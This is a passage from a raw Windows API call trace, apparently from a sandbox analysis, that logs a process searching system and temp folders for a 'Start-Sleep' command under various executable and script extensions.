lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0225.493] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.493] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.494] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.494] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x23 [0225.495] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0225.495] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.495] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.496] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.496] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x23 [0225.497] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0225.497] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.497] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.498] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep", lpFilePart=0x0) returned 0x1f [0225.498] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0225.499] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.499] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.500] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.500] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.500] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.500] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x1a [0225.501] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0225.501] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.501] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.502] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.502] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.502] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.505] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x1b [0225.505] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0225.505] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.506] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.508] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.508] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.509] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.509] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x1b [0225.510] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0225.510] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.510] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.512] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.513] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.513] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.514] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.COM", lpFilePart=0x0) returned 0x1a [0225.514] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0225.514] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.515] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.516] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.516] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.519] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.604] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.606] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.EXE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.607] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.607] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.609] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.BAT", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.609] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.610] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.611] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CMD", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.611] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.612] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.612] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.613] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.614] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 